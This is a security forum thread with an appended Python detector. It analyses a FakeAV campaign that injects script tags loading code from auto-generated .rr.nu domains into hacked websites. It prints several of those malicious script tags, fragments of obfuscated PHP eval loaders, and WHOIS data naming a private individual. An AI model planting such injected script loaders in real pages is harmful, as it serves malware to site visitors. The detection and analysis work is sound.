Malware Campaign from .rr.nu

Prorootect

Thread author
Nov 5, 2011
Malware Campaign from .rr.nu topic only here ..

Malware Campaign from .rr.nu : on blog.sucuri.net : http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html

'We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.'

I too ..

Dyslexic Mayans Want to Sell You Cialis
Problems with preg_replace("/.*/e","\x65\x76 , $_8b7b="\x63\x72\, eval(base64_ hacks, and those damn rr.nu domain redirects : on domesticenthusiast.blogspot.fr : http://domesticenthusiast.blogspot.fr/
.
 
So look at this example:

<!-- Share This END -->
<script src="http://garin90diana.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D

.. or after refresh of this hacked page:


<!-- Share This END -->
<script src="http://pfo42rest.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D:D

.. or:

<script src="http://cua09tedp.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://nings61diagno.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://red38fir.rr.nu/pmg.php?d=x"></script>

etc. etc., then you have the payload: Antivirus 2012 or other FakeAV, from Russia with Love :D
 
On-Going Dynamic FakeAV Campaign (yes, from Russia with Love!..) : on Zscaler blog: http://research.zscaler.com/2012/03/on-going-dynamic-fakeav-campaign.html

'The campaign is making use of auto-domain generation and auto-updating of infected sites to change the embedded link with every visit.' ..

'There were over 100 of our customers attempting to access a large number of websites on a handful of IPs with domains matching the pattern:
[3-6 random letters][2 digits][3-6 random letters].rr.nu
Given the very, very large number of domains used, this has to be some auto-domain generation/registration algorithm used in this campaign.

The pages accessed in the campaign includes:
/n.php?h=1&s=mm
/mm.php?d=x1
/nl.php?p=d

..

195.88.181.112 hosting information:

inetnum: 195.88.181.0 - 195.88.181.255
netname: INET4YOU
descr: PE Bogaturev Sergey Anatolievich
country: RU

person: Bogaturev Sergey
address: RU, Gornuy #####, Komsomolskiy str. '

Aaa, Mr. Sergey, Gornuy ##### .. RU, Gornuy #####, Komsomolskiy str - it's good to know! Visit your police post immediately, and tell all. :(
.
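A small detector for the injection described in this thread, added here as an example (not code from the post or from the Sucuri/Zscaler write-ups): it scans raw page HTML for <script src> tags whose host fits the [3-6 letters][2 digits][3-6 letters].rr.nu pattern quoted from Zscaler and notes whether the path is one of the campaign endpoints listed above. The sample page and the host abc12defg.rr.nu are constructed for the demo; garin90diana.rr.nu and the paths are taken from the thread.

```python
import re
from urllib.parse import urlsplit

# Host pattern quoted in the Zscaler write-up:
# [3-6 random letters][2 digits][3-6 random letters].rr.nu
RRNU_HOST = re.compile(r"^[a-z]{3,6}\d{2}[a-z]{3,6}\.rr\.nu$", re.IGNORECASE)

# Script paths seen in the campaign, taken from the injected tags in the post
# (pmg.php) and from the Zscaler quote (n.php, mm.php, nl.php).
KNOWN_PATHS = {"/pmg.php", "/n.php", "/mm.php", "/nl.php"}

# Loose <script src=...> extractor. Compromised pages are often not well-formed
# HTML, so a regex over the raw text is used instead of a strict parser.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def is_rrnu_dga_host(host: str) -> bool:
    """True when a hostname fits the auto-generated .rr.nu naming pattern."""
    return RRNU_HOST.match(host.strip().lower()) is not None


def find_rrnu_injections(html: str) -> list[dict]:
    """Return one record per injected <script src> pointing at the campaign.

    Each record carries the line number, the host, the path, and whether the
    path is one of the known campaign endpoints (a secondary indicator).
    """
    hits = []
    for lineno, line in enumerate(html.splitlines(), start=1):
        for url in SCRIPT_SRC.findall(line):
            # Relative URLs have no host and are skipped by the host check below.
            parts = urlsplit(url if "//" in url else "//" + url)
            host = parts.hostname or ""
            if is_rrnu_dga_host(host):
                hits.append({"line": lineno, "host": host, "path": parts.path,
                             "known_path": parts.path in KNOWN_PATHS})
    return hits


# Constructed sample page: one legitimate script, the injection seen in the post,
# and a second tag using a made-up host that follows the same generator pattern.
SAMPLE_HTML = """<html><body>
<script src="https://cdn.example.com/jquery.min.js"></script>
<p>page content</p>
<!-- Share This END -->
<script src="http://garin90diana.rr.nu/pmg.php?d=x"></script>
<script type='text/javascript' src='http://abc12defg.rr.nu/n.php?h=1&s=mm'></script>
</body>
</html>"""

if __name__ == "__main__":
    for hit in find_rrnu_injections(SAMPLE_HTML):
        print(f"line {hit['line']}: {hit['host']}{hit['path']} known_path={hit['known_path']}")
```

Run it over a site's HTML files (or a proxy log of fetched pages) to locate the injected tag; the path flag separates the generator pattern from a coincidental .rr.nu hostname.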